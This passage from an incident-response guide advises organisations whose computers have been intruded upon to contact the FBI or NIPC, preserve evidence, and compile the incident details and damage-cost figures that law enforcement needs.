|< Day Day Up >|| |
If your systems are hacked or intruded upon by an unauthorized party, you should call your local FBI office or contact the NIPC. In the event that you experience a crime against your computer systems, the FBI and the NIPC recommend that you respond quickly. Contact law enforcement. Traces are often impossible if too much time is wasted before alerting law enforcement or your own incident-response team.
If you are unsure of what actions to take, do not stop system processes or tamper with files. This may destroy traces of intrusion. Follow organizational policies and procedures. (Your organization should have a computer incident-response capability and plan in place.) Do not contact the suspected perpetrator.
Also remember to use the telephone to communicate. (Attackers may be capable of monitoring e-mail traffic.) Contact the incident-response team for your organization. (Quick use of technical expertise is crucial in preventing further damage and protecting potential evidence.) You should also establish points of contact with general counsel, emergency response staff, and law enforcement. (Preestablished contacts will help in a quick-response effort.)
It is advisable to make copies of files an intruder may have altered or left. If you have the technical expertise to copy files, this action will assist investigators as to when and how the intrusion may have occurred.
You should also identify a primary point of contact to handle potential evidence. This will help to facilitate the establishment of a chain of custody for evidence. (Potential hardware and software evidence that is not properly controlled may lose its value.)
Compile as much information and data as possible about the incident. Information that law-enforcement investigators will find helpful includes the following:
Date, time, and duration of incident
The name, title, telephone number, fax number, and e-mail of the point of contact for law enforcement, as well as the name of your organization, address, city, state, zip code, and country
The physical locations of computer systems and/or networks that have been compromised
Whether the systems are managed in-house or by a contractor
Whether the affected systems or networks are critical to the organization's mission
If your organization is a part of the critical infrastructure, which sector was affected:
Agriculture and food
Defense industrial base
Banking and finance
Chemical industry and hazardous materials
Postal and shipping
National monuments and icons
Nuclear power plants
Commercial key assets
The nature of the problem, which could include intrusion, system impairment, denial of resources, unauthorized root access, Web site defacement, compromise of system integrity, theft, or damage
Whether the problem has been experienced before
The suspected method of intrusion or attack, which could include a virus, an exploited vulnerability, a denial of service, a distributed denial of service, a trapdoor, or a Trojan horse
The suspected perpetrators and the possible motivations of the attack, which could include an insider or disgruntled employee, a former employee, or a competitor. (If the suspect is an employee or former employee, you should determine and report the type of system access that the employee has or had.)
An apparent source (IP address) of the intrusion or attack if known and whether there is any evidence of spoofing
What computer system (hardware, operating system, or applications software) was affected
What security infrastructure was in place, which could include an incident-response team, encryption, a firewall, secure remote access or authorization tools, an intrusion detection system (IDS), security auditing tools, access control lists, or packet filtering
Whether the intrusion or attack resulted in a loss or compromise of sensitive, classified, or proprietary information
Whether the intrusion or attack resulted in damage to systems or data
What actions to mitigate the intrusion or attack have been taken, which could include the system being disconnected from the network, system binaries checked, backup of affected systems, or log files examined
What agencies have been contacted, which could include state or local police, CERT, or FedCIRC
When your system was last modified or updated and the name of the company or organization that did the work (address, phone number, point of contact information)
It is also necessary to determine a dollar value for damage, business loss, and cost to restore systems to normal operating conditions. The following information is helpful in determining dollar amounts:
In the event that repairs or recovery were performed by a contractor, you should determine the charges incurred for services.
If in-house staff were involved in determining the extent of the damage, repairing systems or data, or restoring systems to normal operating conditions, you should determine the number of hours staff expended to accomplish these tasks and the hourly wages, benefits, and overhead associated with each employee involved in the recovery.
If business was disrupted in some way, you should determine the number of transactions or sales that were actually disrupted and their dollar value.
If systems were impaired to the point that actual disrupted transactions or sales cannot be determined, then you should determine the dollar value of transactions or sales that would occur on a comparable day, for the duration of the system outage.
If systems are used to produce goods, deliver services, or manage operations, then determine the value of the loss due to that disruption. (You may have had similar experiences if operations were disrupted because of inclement weather, fires, earthquakes, or other disruptive incidents.)
If systems were physically damaged, you need to know what you paid to acquire and install the systems.
If systems were stolen, you need to know what you paid to acquire and install the systems and the cost of actions taken to ensure that information on the stolen systems cannot be used to access systems.
If intellectual property or trade secrets were stolen, then you need to determine the value of that property.
If intellectual property or trade secrets were used by a competitor or other party, then you need to determine the impact on your business.
A good source of information about dealing with intrusions is available from the High Tech Crime Investigation Association Web site www.htcia.org, and specific information is available at the San Diego Chapter's Web site, www.htcia-sd.org. The San Diego Chapter has also published a guide for working with law-enforcement agencies when you have had a computer incident; this is available at www.htcia-sd.org/htciaguide.pdf.
|< Day Day Up >|| |